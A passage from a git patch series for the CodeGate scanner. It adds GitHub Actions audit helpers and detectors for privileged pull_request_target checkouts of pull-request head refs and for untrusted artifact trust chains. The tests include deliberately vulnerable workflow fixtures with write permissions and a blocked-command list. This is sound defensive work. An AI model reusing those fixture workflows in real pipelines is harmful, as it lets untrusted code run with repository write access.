From ebb3c68f4a0b477da85fe4f92fc211ad684f916e Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 13:46:57 +0000 Subject: [PATCH 1/6] feat(workflow): add wave-f foundations and pr-target checkout detector --- docs/workflow-audit-parity-checklist.md | 11 + .../workflow-pr-target-checkout-head.ts | 130 +++++++++ src/layer2-static/engine.ts | 12 + src/layer2-static/workflow/analysis.ts | 264 ++++++++++++++++++ src/layer2-static/workflow/parser.ts | 49 +++- src/layer2-static/workflow/types.ts | 6 + tests/layer2/workflow-analysis.test.ts | 153 ++++++++++ tests/layer2/workflow-parser.test.ts | 12 + .../workflow-pr-target-checkout-head.test.ts | 136 +++++++++ tests/layer2/workflow-wave-f-engine.test.ts | 64 +++++ .../workflow-audit-parity-contract.test.ts | 1 + 11 files changed, 827 insertions(+), 11 deletions(-) create mode 100644 src/layer2-static/detectors/workflow-pr-target-checkout-head.ts create mode 100644 src/layer2-static/workflow/analysis.ts create mode 100644 tests/layer2/workflow-analysis.test.ts create mode 100644 tests/layer2/workflow-pr-target-checkout-head.test.ts create mode 100644 tests/layer2/workflow-wave-f-engine.test.ts diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md index 3716e06..4418f57 100644 --- a/docs/workflow-audit-parity-checklist.md +++ b/docs/workflow-audit-parity-checklist.md @@ -51,6 +51,17 @@ Use this checklist to track the workflow-audit detectors implemented in CodeGate - [x] `unredacted-secrets` - [x] `bot-conditions` +## Wave F (Planned) + +- [ ] `workflow-call-boundary` +- [ ] `workflow-artifact-trust-chain` +- [ ] `workflow-oidc-untrusted-context` +- [x] `workflow-pr-target-checkout-head` +- [ ] `workflow-dynamic-matrix-injection` +- [ ] `workflow-secret-exfiltration` +- [ ] `dependabot-auto-merge` +- [ ] `workflow-local-action-mutation` + ## Notes - Checked items are implemented in CodeGate. diff --git a/src/layer2-static/detectors/workflow-pr-target-checkout-head.ts b/src/layer2-static/detectors/workflow-pr-target-checkout-head.ts new file mode 100644 index 0000000..928a5cd --- /dev/null +++ b/src/layer2-static/detectors/workflow-pr-target-checkout-head.ts @@ -0,0 +1,130 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { collectUntrustedReachableJobIds } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowPrTargetCheckoutHeadInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + return Object.values(value as Record).some((permission) => { + if (typeof permission !== "string") { + return false; + } + return permission.trim().toLowerCase() === "write"; + }); +} + +function isCheckoutStep(uses: string | undefined): boolean { + if (!uses) { + return false; + } + return /^actions\/checkout(?:@.+)?$/iu.test(uses.trim()); +} + +function isRiskyCheckoutRef(ref: string | undefined): boolean { + if (!ref) { + return false; + } + const normalized = ref.toLowerCase(); + return ( + normalized.includes("github.event.pull_request.head.") || normalized.includes("github.head_ref") + ); +} + +function hasInheritedSecrets(secrets: unknown): boolean { + return typeof secrets === "string" && secrets.trim().toLowerCase() === "inherit"; +} + +export function detectWorkflowPrTargetCheckoutHead( + input: WorkflowPrTargetCheckoutHeadInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const hasPullRequestTarget = facts.triggers.some( + (trigger) => trigger.trim().toLowerCase() === "pull_request_target", + ); + if (!hasPullRequestTarget) { + return []; + } + + const reachableJobIds = collectUntrustedReachableJobIds(facts); + if (reachableJobIds.size === 0) { + return []; + } + + const findings: Finding[] = []; + const workflowPrivileged = hasWritePermission(facts.workflowPermissions); + + facts.jobs.forEach((job, jobIndex) => { + if (!reachableJobIds.has(job.id)) { + return; + } + + const jobPrivileged = + workflowPrivileged || hasWritePermission(job.permissions) || hasInheritedSecrets(job.secrets); + + job.steps.forEach((step, stepIndex) => { + if (!isCheckoutStep(step.uses)) { + return; + } + if (!isRiskyCheckoutRef(step.with?.ref)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ + "pull_request_target", + "actions/checkout", + step.with?.ref ?? "github.event.pull_request.head", + ], + fallbackValue: "pull_request_target workflow checks out untrusted PR head ref", + }); + + findings.push({ + rule_id: "workflow-pr-target-checkout-head", + finding_id: `WORKFLOW_PR_TARGET_CHECKOUT_HEAD-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: jobPrivileged ? "CRITICAL" : "HIGH", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].with.ref` }, + description: + "pull_request_target job checks out pull request head ref, enabling untrusted code execution in privileged context", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-284", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid checking out pull request head refs in pull_request_target workflows", + "Use pull_request for untrusted code validation and keep privileged operations isolated", + "Enforce least-privilege token scopes and avoid inherited secrets for untrusted paths", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 50f9ec5..3cf6455 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -41,6 +41,7 @@ import { detectDependabotExecution } from "./detectors/dependabot-execution.js"; import { detectWorkflowHardcodedContainerCredentials } from "./detectors/workflow-hardcoded-container-credentials.js"; import { detectWorkflowUnredactedSecrets } from "./detectors/workflow-unredacted-secrets.js"; import { detectWorkflowBotConditions } from "./detectors/workflow-bot-conditions.js"; +import { detectWorkflowPrTargetCheckoutHead } from "./detectors/workflow-pr-target-checkout-head.js"; import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; @@ -647,6 +648,17 @@ function buildFileAudits(): Array> { }) : [], }, + { + id: "workflow-pr-target-checkout-head", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowPrTargetCheckoutHead({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, { id: "hardcoded-container-credentials", run: ({ file, input }) => diff --git a/src/layer2-static/workflow/analysis.ts b/src/layer2-static/workflow/analysis.ts new file mode 100644 index 0000000..c9211ef --- /dev/null +++ b/src/layer2-static/workflow/analysis.ts @@ -0,0 +1,264 @@ +import type { WorkflowFacts } from "./types.js"; + +const UNTRUSTED_TRIGGER_SET = new Set([ + "pull_request", + "pull_request_target", + "workflow_run", + "issue_comment", + "pull_request_review_comment", + "discussion_comment", +]); + +const BOT_ONLY_CONDITION_PATTERNS = [ + /github\.actor\s*==\s*['"]dependabot\[bot\]['"]/iu, + /github\.actor\s*==\s*['"]github-actions\[bot\]['"]/iu, + /github\.event\.pull_request\.head\.repo\.fork\s*==\s*false/iu, +]; + +const UPLOAD_ARTIFACT_ACTIONS = new Set([ + "actions/upload-artifact", + "actions/upload-artifact/merge", +]); + +const DOWNLOAD_ARTIFACT_ACTIONS = new Set(["actions/download-artifact"]); + +export interface WorkflowArtifactTransferEdge { + artifactName: string; + producerJobId: string; + producerStepIndex: number; + consumerJobId: string; + consumerStepIndex: number; + consumerDownloadsAll: boolean; +} + +export interface WorkflowCallBoundaryContext { + hasWorkflowCall: boolean; + declaredInputKeys: string[]; + requiredInputKeys: string[]; + declaredSecretKeys: string[]; + requiredSecretKeys: string[]; + jobsWithInheritedSecrets: string[]; + jobsCallingReusableWorkflow: string[]; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function normalizeUses(uses: string | undefined): string | null { + if (!uses) { + return null; + } + const trimmed = uses.trim().toLowerCase(); + if (trimmed.length === 0) { + return null; + } + const atIndex = trimmed.indexOf("@"); + if (atIndex === -1) { + return trimmed; + } + return trimmed.slice(0, atIndex); +} + +function isWorkflowTriggerUntrusted(trigger: string): boolean { + return UNTRUSTED_TRIGGER_SET.has(trigger.trim().toLowerCase()); +} + +function isUntrustedRestrictedCondition(condition: string | undefined): boolean { + if (!condition) { + return false; + } + return BOT_ONLY_CONDITION_PATTERNS.some((pattern) => pattern.test(condition)); +} + +function normalizeArtifactName(value: string | undefined): string | null { + if (!value) { + return null; + } + const normalized = value.trim(); + return normalized.length > 0 ? normalized : null; +} + +export function buildWorkflowNeedsGraph(facts: WorkflowFacts): Map { + return new Map(facts.jobs.map((job) => [job.id, [...job.needs]])); +} + +export function collectTransitiveDependencies( + facts: WorkflowFacts, + seedJobIds: Iterable, +): Set { + const graph = buildWorkflowNeedsGraph(facts); + const visited = new Set(); + const queue = [...seedJobIds]; + + while (queue.length > 0) { + const current = queue.shift(); + if (!current) { + continue; + } + const dependencies = graph.get(current) ?? []; + for (const dependency of dependencies) { + if (visited.has(dependency)) { + continue; + } + visited.add(dependency); + queue.push(dependency); + } + } + + return visited; +} + +export function collectTransitiveDependents( + facts: WorkflowFacts, + seedJobIds: Iterable, +): Set { + const reverseGraph = new Map(); + for (const job of facts.jobs) { + for (const dependency of job.needs) { + const dependents = reverseGraph.get(dependency) ?? []; + dependents.push(job.id); + reverseGraph.set(dependency, dependents); + } + } + + const visited = new Set(); + const queue = [...seedJobIds]; + while (queue.length > 0) { + const current = queue.shift(); + if (!current) { + continue; + } + const dependents = reverseGraph.get(current) ?? []; + for (const dependent of dependents) { + if (visited.has(dependent)) { + continue; + } + visited.add(dependent); + queue.push(dependent); + } + } + return visited; +} + +export function collectArtifactTransferEdges(facts: WorkflowFacts): WorkflowArtifactTransferEdge[] { + const producersByArtifact = new Map>(); + + const edges: WorkflowArtifactTransferEdge[] = []; + const dedupe = new Set(); + + for (const job of facts.jobs) { + for (const [stepIndex, step] of job.steps.entries()) { + const normalizedUses = normalizeUses(step.uses); + if (!normalizedUses || !UPLOAD_ARTIFACT_ACTIONS.has(normalizedUses)) { + continue; + } + const artifactName = normalizeArtifactName(step.with?.name) ?? "__unnamed__"; + const producers = producersByArtifact.get(artifactName) ?? []; + producers.push({ jobId: job.id, stepIndex }); + producersByArtifact.set(artifactName, producers); + } + } + + for (const job of facts.jobs) { + for (const [stepIndex, step] of job.steps.entries()) { + const normalizedUses = normalizeUses(step.uses); + if (!normalizedUses || !DOWNLOAD_ARTIFACT_ACTIONS.has(normalizedUses)) { + continue; + } + + const requestedName = normalizeArtifactName(step.with?.name); + const consumerDownloadsAll = !requestedName; + const artifactNames = requestedName + ? [requestedName] + : Array.from(producersByArtifact.keys()); + + for (const artifactName of artifactNames) { + const producers = producersByArtifact.get(artifactName) ?? []; + for (const producer of producers) { + const key = [ + artifactName, + producer.jobId, + producer.stepIndex, + job.id, + stepIndex, + consumerDownloadsAll ? "all" : "named", + ].join("|"); + if (dedupe.has(key)) { + continue; + } + dedupe.add(key); + edges.push({ + artifactName, + producerJobId: producer.jobId, + producerStepIndex: producer.stepIndex, + consumerJobId: job.id, + consumerStepIndex: stepIndex, + consumerDownloadsAll, + }); + } + } + } + } + + return edges; +} + +export function collectUntrustedReachableJobIds(facts: WorkflowFacts): Set { + const hasUntrustedTrigger = facts.triggers.some((trigger) => isWorkflowTriggerUntrusted(trigger)); + if (!hasUntrustedTrigger) { + return new Set(); + } + + return new Set( + facts.jobs.filter((job) => !isUntrustedRestrictedCondition(job.if)).map((job) => job.id), + ); +} + +export function extractWorkflowCallBoundaryContext( + parsed: unknown, + facts: WorkflowFacts, +): WorkflowCallBoundaryContext { + const root = asRecord(parsed); + const onRecord = root ? asRecord(root.on) : null; + const workflowCall = onRecord ? asRecord(onRecord.workflow_call) : null; + + const inputsRecord = workflowCall ? asRecord(workflowCall.inputs) : null; + const declaredInputKeys = inputsRecord ? Object.keys(inputsRecord) : []; + const requiredInputKeys = inputsRecord + ? Object.entries(inputsRecord) + .filter(([, value]) => asRecord(value)?.required === true) + .map(([key]) => key) + : []; + + const secretsRecord = workflowCall ? asRecord(workflowCall.secrets) : null; + const declaredSecretKeys = secretsRecord ? Object.keys(secretsRecord) : []; + const requiredSecretKeys = secretsRecord + ? Object.entries(secretsRecord) + .filter(([, value]) => asRecord(value)?.required === true) + .map(([key]) => key) + : []; + + const jobsWithInheritedSecrets = facts.jobs + .filter( + (job) => typeof job.secrets === "string" && job.secrets.trim().toLowerCase() === "inherit", + ) + .map((job) => job.id); + + const jobsCallingReusableWorkflow = facts.jobs + .filter((job) => typeof job.uses === "string" && job.uses.trim().length > 0) + .map((job) => job.id); + + return { + hasWorkflowCall: workflowCall !== null, + declaredInputKeys, + requiredInputKeys, + declaredSecretKeys, + requiredSecretKeys, + jobsWithInheritedSecrets, + jobsCallingReusableWorkflow, + }; +} diff --git a/src/layer2-static/workflow/parser.ts b/src/layer2-static/workflow/parser.ts index 2ceb3d1..63a6b1f 100644 --- a/src/layer2-static/workflow/parser.ts +++ b/src/layer2-static/workflow/parser.ts @@ -11,6 +11,37 @@ function asString(value: unknown): string | undefined { return typeof value === "string" ? value : undefined; } +function toStringMap(value: unknown): Record | undefined { + const record = asRecord(value); + if (!record) { + return undefined; + } + + const entries: Record = {}; + for (const [key, entry] of Object.entries(record)) { + if (typeof entry === "string") { + entries[key] = entry; + } + } + + return Object.keys(entries).length > 0 ? entries : undefined; +} + +function extractNeeds(value: unknown): string[] { + if (typeof value === "string") { + const normalized = value.trim(); + return normalized.length > 0 ? [normalized] : []; + } + + if (!Array.isArray(value)) { + return []; + } + + return value.filter( + (entry): entry is string => typeof entry === "string" && entry.trim().length > 0, + ); +} + function normalizeWorkflowPath(value: string): string { return value.replaceAll("\\", "/"); } @@ -41,20 +72,11 @@ function extractStepFacts(step: unknown): WorkflowStepFacts | null { return null; } - const withValues = asRecord(stepRecord.with); - const withEntries: Record = {}; - if (withValues) { - for (const [key, value] of Object.entries(withValues)) { - if (typeof value === "string") { - withEntries[key] = value; - } - } - } - const stepFacts: WorkflowStepFacts = { + if: asString(stepRecord.if), uses: asString(stepRecord.uses), run: asString(stepRecord.run), - with: Object.keys(withEntries).length > 0 ? withEntries : undefined, + with: toStringMap(stepRecord.with), }; if (!stepFacts.uses && !stepFacts.run) { @@ -77,6 +99,11 @@ function extractJobFacts(id: string, value: unknown): WorkflowJobFacts | null { return { id, + if: asString(jobRecord.if), + uses: asString(jobRecord.uses), + with: toStringMap(jobRecord.with), + needs: extractNeeds(jobRecord.needs), + secrets: jobRecord.secrets, permissions: jobRecord.permissions, steps, }; diff --git a/src/layer2-static/workflow/types.ts b/src/layer2-static/workflow/types.ts index 4570621..cfc1ad2 100644 --- a/src/layer2-static/workflow/types.ts +++ b/src/layer2-static/workflow/types.ts @@ -1,4 +1,5 @@ export interface WorkflowStepFacts { + if?: string; uses?: string; run?: string; with?: Record; @@ -6,6 +7,11 @@ export interface WorkflowStepFacts { export interface WorkflowJobFacts { id: string; + if?: string; + uses?: string; + with?: Record; + needs: string[]; + secrets?: unknown; permissions?: unknown; steps: WorkflowStepFacts[]; } diff --git a/tests/layer2/workflow-analysis.test.ts b/tests/layer2/workflow-analysis.test.ts new file mode 100644 index 0000000..2d96681 --- /dev/null +++ b/tests/layer2/workflow-analysis.test.ts @@ -0,0 +1,153 @@ +import { describe, expect, it } from "vitest"; +import { extractWorkflowFacts } from "../../src/layer2-static/workflow/parser"; +import { + buildWorkflowNeedsGraph, + collectArtifactTransferEdges, + collectTransitiveDependencies, + collectTransitiveDependents, + collectUntrustedReachableJobIds, + extractWorkflowCallBoundaryContext, +} from "../../src/layer2-static/workflow/analysis"; + +describe("workflow analysis helpers", () => { + it("builds dependency graph and computes transitive closures", () => { + const facts = extractWorkflowFacts({ + on: ["push"], + jobs: { + build: {}, + test: { needs: "build" }, + package: { needs: ["test"] }, + deploy: { needs: ["package"] }, + }, + }); + + expect(facts).not.toBeNull(); + const graph = buildWorkflowNeedsGraph(facts!); + expect(graph.get("deploy")).toEqual(["package"]); + expect(graph.get("test")).toEqual(["build"]); + + expect(Array.from(collectTransitiveDependencies(facts!, ["deploy"])).sort()).toEqual([ + "build", + "package", + "test", + ]); + + expect(Array.from(collectTransitiveDependents(facts!, ["build"])).sort()).toEqual([ + "deploy", + "package", + "test", + ]); + }); + + it("links artifact producer and consumer jobs", () => { + const facts = extractWorkflowFacts({ + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/upload-artifact@v4", + with: { name: "dist" }, + }, + ], + }, + verify: { + needs: "build", + steps: [ + { + uses: "actions/download-artifact@v4", + with: { name: "dist" }, + }, + ], + }, + aggregate: { + steps: [ + { + uses: "actions/download-artifact@v4", + }, + ], + }, + }, + }); + + expect(facts).not.toBeNull(); + const edges = collectArtifactTransferEdges(facts!); + expect(edges).toEqual( + expect.arrayContaining([ + expect.objectContaining({ + artifactName: "dist", + producerJobId: "build", + consumerJobId: "verify", + }), + expect.objectContaining({ + artifactName: "dist", + producerJobId: "build", + consumerJobId: "aggregate", + consumerDownloadsAll: true, + }), + ]), + ); + }); + + it("identifies untrusted-trigger jobs while honoring restrictive bot-only conditions", () => { + const facts = extractWorkflowFacts({ + on: ["pull_request_target"], + jobs: { + open: {}, + bot_only: { + if: "github.actor == 'dependabot[bot]'", + }, + guarded: { + if: "github.event.pull_request.head.repo.fork == false", + }, + }, + }); + + expect(facts).not.toBeNull(); + expect(Array.from(collectUntrustedReachableJobIds(facts!)).sort()).toEqual(["open"]); + }); + + it("extracts workflow_call boundary context including inherited secrets and reusable workflow jobs", () => { + const parsed = { + on: { + workflow_call: { + inputs: { + config_path: { + required: true, + type: "string", + }, + }, + secrets: { + publish_token: { + required: true, + }, + }, + }, + }, + jobs: { + prepare: { + secrets: "inherit", + steps: [{ run: "echo prep" }], + }, + invoke_release: { + uses: "org/shared/.github/workflows/release.yml@v1", + with: { + publish: "true", + }, + }, + }, + }; + + const facts = extractWorkflowFacts(parsed); + expect(facts).not.toBeNull(); + + const boundary = extractWorkflowCallBoundaryContext(parsed, facts!); + expect(boundary.hasWorkflowCall).toBe(true); + expect(boundary.declaredInputKeys).toEqual(["config_path"]); + expect(boundary.requiredInputKeys).toEqual(["config_path"]); + expect(boundary.declaredSecretKeys).toEqual(["publish_token"]); + expect(boundary.requiredSecretKeys).toEqual(["publish_token"]); + expect(boundary.jobsWithInheritedSecrets).toEqual(["prepare"]); + expect(boundary.jobsCallingReusableWorkflow).toEqual(["invoke_release"]); + }); +}); diff --git a/tests/layer2/workflow-parser.test.ts b/tests/layer2/workflow-parser.test.ts index 559fef3..4319987 100644 --- a/tests/layer2/workflow-parser.test.ts +++ b/tests/layer2/workflow-parser.test.ts @@ -17,9 +17,16 @@ describe("workflow parser", () => { permissions: "write-all", jobs: { test: { + if: "github.actor == 'dependabot[bot]'", + needs: "prepare", permissions: { contents: "write", }, + secrets: "inherit", + uses: "org/reusable/.github/workflows/test.yml@v1", + with: { + language: "node", + }, steps: [ { uses: "actions/checkout@v4", @@ -36,6 +43,11 @@ describe("workflow parser", () => { expect(facts?.triggers).toEqual(expect.arrayContaining(["pull_request", "workflow_dispatch"])); expect(facts?.workflowPermissions).toBe("write-all"); expect(facts?.jobs).toHaveLength(1); + expect(facts?.jobs[0]?.if).toContain("dependabot"); + expect(facts?.jobs[0]?.needs).toEqual(["prepare"]); + expect(facts?.jobs[0]?.uses).toBe("org/reusable/.github/workflows/test.yml@v1"); + expect(facts?.jobs[0]?.with?.language).toBe("node"); + expect(facts?.jobs[0]?.secrets).toBe("inherit"); expect(facts?.jobs[0]?.steps[0]?.uses).toBe("actions/checkout@v4"); expect(facts?.jobs[0]?.steps[1]?.run).toContain("${{"); }); diff --git a/tests/layer2/workflow-pr-target-checkout-head.test.ts b/tests/layer2/workflow-pr-target-checkout-head.test.ts new file mode 100644 index 0000000..72bab09 --- /dev/null +++ b/tests/layer2/workflow-pr-target-checkout-head.test.ts @@ -0,0 +1,136 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowPrTargetCheckoutHead } from "../../src/layer2-static/detectors/workflow-pr-target-checkout-head"; + +describe("workflow pr-target checkout head detector", () => { + it("flags pull_request_target workflows that checkout PR head with write permissions", () => { + const findings = detectWorkflowPrTargetCheckoutHead({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: \${{ github.event.pull_request.head.sha }} +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/checkout@v4", + with: { + ref: "${{ github.event.pull_request.head.sha }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-pr-target-checkout-head"); + expect(findings[0]?.severity).toBe("CRITICAL"); + }); + + it("flags pull_request_target checkout of PR head even without explicit write permissions", () => { + const findings = detectWorkflowPrTargetCheckoutHead({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + verify: + steps: + - uses: actions/checkout@v4 + with: + ref: \${{ github.event.pull_request.head.ref }} +`, + parsed: { + on: ["pull_request_target"], + jobs: { + verify: { + steps: [ + { + uses: "actions/checkout@v4", + with: { + ref: "${{ github.event.pull_request.head.ref }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.severity).toBe("HIGH"); + }); + + it("does not flag pull_request workflows", () => { + const findings = detectWorkflowPrTargetCheckoutHead({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + permissions: + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: \${{ github.event.pull_request.head.sha }} +`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/checkout@v4", + with: { + ref: "${{ github.event.pull_request.head.sha }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); + + it("does not flag pull_request_target workflows without risky checkout ref", () => { + const findings = detectWorkflowPrTargetCheckoutHead({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + steps: + - uses: actions/checkout@v4 +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + steps: [ + { + uses: "actions/checkout@v4", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-f-engine.test.ts b/tests/layer2/workflow-wave-f-engine.test.ts new file mode 100644 index 0000000..df58253 --- /dev/null +++ b/tests/layer2/workflow-wave-f-engine.test.ts @@ -0,0 +1,64 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "auditor", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow wave F engine integration", () => { + it("surfaces workflow-pr-target-checkout-head findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: \${{ github.event.pull_request.head.sha }} +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/checkout@v4", + with: { + ref: "${{ github.event.pull_request.head.sha }}", + }, + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-pr-target-checkout-head")).toBe(true); + }); +}); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts index d8f2585..2ff2e43 100644 --- a/tests/meta/workflow-audit-parity-contract.test.ts +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -40,6 +40,7 @@ const expectedCheckedAuditIds = [ "hardcoded-container-credentials", "unredacted-secrets", "bot-conditions", + "workflow-pr-target-checkout-head", ] as const; function readChecklist(): string { From 203bc431c0c0cfd17e6ef7d8620715b6b56c25f9 Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 13:51:24 +0000 Subject: [PATCH 2/6] feat(workflow): add artifact trust-chain and call-boundary audits --- docs/workflow-audit-parity-checklist.md | 3 +- .../workflow-artifact-trust-chain.ts | 120 ++++++++++++++++ .../detectors/workflow-call-boundary.ts | 112 +++++++++++++++ src/layer2-static/engine.ts | 24 ++++ .../workflow-artifact-trust-chain.test.ts | 117 +++++++++++++++ tests/layer2/workflow-call-boundary.test.ts | 133 ++++++++++++++++++ tests/layer2/workflow-wave-f-engine.test.ts | 102 ++++++++++++++ .../workflow-audit-parity-contract.test.ts | 2 + 8 files changed, 612 insertions(+), 1 deletion(-) create mode 100644 src/layer2-static/detectors/workflow-artifact-trust-chain.ts create mode 100644 src/layer2-static/detectors/workflow-call-boundary.ts create mode 100644 tests/layer2/workflow-artifact-trust-chain.test.ts create mode 100644 tests/layer2/workflow-call-boundary.test.ts diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md index 4418f57..94d3d19 100644 --- a/docs/workflow-audit-parity-checklist.md +++ b/docs/workflow-audit-parity-checklist.md @@ -54,7 +54,8 @@ Use this checklist to track the workflow-audit detectors implemented in CodeGate ## Wave F (Planned) - [ ] `workflow-call-boundary` -- [ ] `workflow-artifact-trust-chain` +- [x] `workflow-call-boundary` +- [x] `workflow-artifact-trust-chain` - [ ] `workflow-oidc-untrusted-context` - [x] `workflow-pr-target-checkout-head` - [ ] `workflow-dynamic-matrix-injection` diff --git a/src/layer2-static/detectors/workflow-artifact-trust-chain.ts b/src/layer2-static/detectors/workflow-artifact-trust-chain.ts new file mode 100644 index 0000000..edf42ae --- /dev/null +++ b/src/layer2-static/detectors/workflow-artifact-trust-chain.ts @@ -0,0 +1,120 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { + collectArtifactTransferEdges, + collectUntrustedReachableJobIds, +} from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowArtifactTrustChainInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + return Object.values(value as Record).some( + (permission) => typeof permission === "string" && permission.trim().toLowerCase() === "write", + ); +} + +function hasInheritedSecrets(secrets: unknown): boolean { + return typeof secrets === "string" && secrets.trim().toLowerCase() === "inherit"; +} + +function hasExecutableRunStep(jobSteps: Array<{ run?: string }>): boolean { + return jobSteps.some((step) => typeof step.run === "string" && step.run.trim().length > 0); +} + +export function detectWorkflowArtifactTrustChain( + input: WorkflowArtifactTrustChainInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const untrustedJobIds = collectUntrustedReachableJobIds(facts); + if (untrustedJobIds.size === 0) { + return []; + } + + const workflowHasWritePermissions = hasWritePermission(facts.workflowPermissions); + const jobsById = new Map(facts.jobs.map((job) => [job.id, job])); + const findings: Finding[] = []; + const dedupe = new Set(); + + for (const edge of collectArtifactTransferEdges(facts)) { + if (!untrustedJobIds.has(edge.producerJobId)) { + continue; + } + + const consumerJob = jobsById.get(edge.consumerJobId); + if (!consumerJob) { + continue; + } + + const consumerPrivileged = + workflowHasWritePermissions || + hasWritePermission(consumerJob.permissions) || + hasInheritedSecrets(consumerJob.secrets); + + if (!consumerPrivileged || !hasExecutableRunStep(consumerJob.steps)) { + continue; + } + + const dedupeKey = `${edge.producerJobId}|${edge.consumerJobId}|${edge.artifactName}`; + if (dedupe.has(dedupeKey)) { + continue; + } + dedupe.add(dedupeKey); + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ + "actions/upload-artifact", + "actions/download-artifact", + edge.artifactName, + "pull_request", + ], + fallbackValue: `${edge.consumerJobId} consumes artifact ${edge.artifactName} from untrusted producer ${edge.producerJobId}`, + }); + + findings.push({ + rule_id: "workflow-artifact-trust-chain", + finding_id: `WORKFLOW_ARTIFACT_TRUST_CHAIN-${input.filePath}-${edge.producerJobId}-${edge.consumerJobId}-${edge.artifactName}`, + severity: edge.consumerDownloadsAll ? "CRITICAL" : "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${edge.consumerJobId}.steps[${edge.consumerStepIndex}]` }, + description: + "Privileged job executes after downloading artifacts produced in an untrusted workflow path", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Separate untrusted artifact production from privileged execution jobs", + "Require integrity verification before consuming downloaded artifacts", + "Avoid executing downloaded artifacts in jobs with write tokens or inherited secrets", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git 